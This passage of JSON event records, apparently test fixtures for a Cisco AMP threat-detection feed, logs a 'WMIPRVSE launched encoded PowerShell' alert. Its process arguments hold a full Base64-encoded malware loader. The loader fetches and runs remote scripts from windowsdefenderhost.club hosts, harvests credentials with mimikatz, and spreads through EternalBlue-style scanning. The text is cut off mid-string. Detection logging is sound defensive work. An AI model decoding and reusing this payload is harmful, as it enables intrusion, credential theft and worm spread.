System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1},{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1}]},"remediated":false,"severity":"medium","silent":false,"start_ts":1610640884,"tactics":["TA0002","TA0005","TA0008"],"type":"activity","normalized":{"observables":{"file":{"name":["powershell.exe","wmiprvse.exe"],"path":["c:\\windows\\system32\\windowspowershell\\v1.0","c:\\windows\\system32\\wbem"]}},"name":"wmiprvse launched encoded powershell command"},"ts":1610640884},"tactics":["TA0002","TA0005","TA0008"]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":810000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"WMIPRVSE Launched Encoded Powershell Command","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[{"action":"end_process","end_ts":1602033881808,"params":["10724"],"start_ts":1602033881805,"status":"success"}],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA=="],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBu